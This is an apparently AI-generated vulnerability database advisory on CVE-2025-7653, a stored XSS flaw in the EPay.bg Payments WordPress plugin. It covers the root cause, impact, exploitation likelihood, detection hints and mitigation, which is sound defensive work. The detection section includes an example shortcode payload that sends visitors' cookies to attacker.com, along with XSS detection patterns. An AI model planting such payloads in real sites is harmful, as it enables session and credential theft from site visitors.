
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-7653 is a Stored Cross-Site Scripting (XSS) vulnerability in the EPay.bg Payments plugin for WordPress, affecting all versions up to and including 0.1. The flaw arises from insufficient input sanitization and output escaping on user-supplied attributes within the plugin's epay shortcode. It was published on July 19, 2025, with the CVE assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Authenticated attackers with contributor-level access or higher can embed malicious JavaScript within the epay shortcode's attributes in a WordPress post or page. Because the plugin fails to sanitize input or escape output before rendering, the injected script is stored server-side and executes in the browsers of any user who subsequently visits the affected page. The vulnerable code is present in the plugin's main file (epay-payments.php) as available in the plugin's SVN repository (Wordfence, ENISA EUVD).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user's browser session when they visit a page containing the injected shortcode. This can lead to session token theft, credential harvesting, defacement of page content, redirection to malicious sites, or delivery of further malware payloads to site visitors. The scope is changed (S:C), meaning the impact extends beyond the attacker's own session to affect other users, though availability is not directly impacted (Wordfence, ENISA EUVD).
No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported as of the disclosure date. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum contributor-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence, ENISA EUVD).
epay shortcode can be inserted.[epay attribute="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].wp-admin/post.php or REST API endpoints containing epay shortcode content with encoded script tags or JavaScript event handlers.wp_posts table entries containing [epay shortcode with unexpected HTML or JavaScript attributes (e.g., <script>, onerror=, onload=).epay shortcode, potentially carrying cookie or session data in query parameters.wp-content/plugins/epaybg-payments/ for unauthorized modifications (Wordfence).The affected plugin (EPay.bg Payments, version ≤ 0.1) should be deactivated and removed from WordPress installations until a patched version is released by the vendor. Site administrators should audit all posts and pages for malicious epay shortcode content and remove any suspicious entries. As a general hardening measure, restrict contributor-level user registrations and review user roles to limit the number of accounts that can insert shortcodes. Monitor the WordPress plugin repository and Wordfence advisories for an updated, patched release (Wordfence, ENISA EUVD).
Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for the period of July 14–20, 2025, noting it among numerous plugin-level XSS issues discovered that week (Wordfence Weekly Report). No significant independent researcher commentary, vendor statements beyond the Wordfence advisory, or notable media coverage has been identified for this specific CVE.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."